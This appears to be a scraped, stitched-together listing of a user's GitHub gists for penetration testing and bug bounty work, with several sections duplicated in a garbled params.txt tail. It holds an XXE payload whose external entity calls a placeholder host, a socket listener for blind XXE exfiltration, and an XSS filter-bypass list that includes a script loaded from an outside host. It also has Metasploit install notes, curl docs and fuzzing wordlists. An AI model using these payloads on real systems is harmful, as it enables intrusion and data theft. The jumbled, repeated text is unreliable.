x1m x1mdev

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## xxeftp.py
#!/usr/env/python
from __future__ import print_function
import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('0.0.0.0',2121))
s.listen(1)
print('XXE-FTP listening ')
conn,addr = s.accept()
print('Connected by %s',addr)

## Install Metasploit on OS X
# XCode Command Line Tools

>xcode-select --install

# Install Homebrew

>ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
>echo PATH=/usr/local/bin:/usr/local/sbin:$PATH >> ~/.bash_profile
>source ~/.bash_profile
>brew tap homebrew/versions

## xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>

## curl.md

      
              5 files
            
          
              996 forks
            
          
              100 comments
            
          
              3953 stars
            
          
                subfuzion
                / curl.md
            
            
              Last active
              May 16, 2024 18:04
            
              
                curl POST examples
              
          
    Common Options

-#, --progress-bar
Make curl display a simple progress bar instead of the more informational standard meter.
-b, --cookie <name=data>
Supply cookie with request. If no =, then specifies the cookie file to use (see -c).
-c, --cookie-jar <file name>
File to save response cookies to.

  
## ngrok_hostname.sh
#!/bin/sh

# ngrok's web interface is HTML, but configuration is bootstrapped as a JSON
# string. We can hack out the forwarded hostname by extracting the next
# `*.ngrok.io` string from the JSON
#
# Brittle as all get out--YMMV. If you're still reading, usage is:
#
#     $ ./ngrok_hostname.sh <proto> <addr>
#

## all.txt

.
..
........
@
*
*.*
*.*.*
ðŸŽ

## github_bugbountyhunting.md

      
              1 file
            
          
              98 forks
            
          
              15 comments
            
          
              532 stars
            
          
                EdOverflow
                / github_bugbountyhunting.md
            
            
              Last active
              April 29, 2024 14:36
            
              
                My tips for finding security issues in GitHub projects.
              
          
    GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.
Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.
$ python githubcloner.py --org organization -o /tmp/output

  
## content_discovery_all.txt
`
~/
~
×™×


___
__
_

## params.txt
0
1
11
12
13
14
15
16
17
2
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	#!/usr/env/python
	from __future__ import print_function
	import socket

	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.bind(('0.0.0.0',2121))
	s.listen(1)
	print('XXE-FTP listening ')
	conn,addr = s.accept()
	print('Connected by %s',addr)
	# XCode Command Line Tools

	>xcode-select --install

	# Install Homebrew

	>ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
	>echo PATH=/usr/local/bin:/usr/local/sbin:$PATH >> ~/.bash_profile
	>source ~/.bash_profile
	>brew tap homebrew/versions
	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	'';!--"<XSS>=&{()}
	0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
	<script/src=data:,alert()>
	<marquee/onstart=alert()>
	<video/poster/onerror=alert()>
	<isindex/autofocus/onfocus=alert()>
	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert('XSS')>
	#!/bin/sh

	# ngrok's web interface is HTML, but configuration is bootstrapped as a JSON
	# string. We can hack out the forwarded hostname by extracting the next
	# `*.ngrok.io` string from the JSON
	#
	# Brittle as all get out--YMMV. If you're still reading, usage is:
	#
	# $ ./ngrok_hostname.sh <proto> <addr>
	#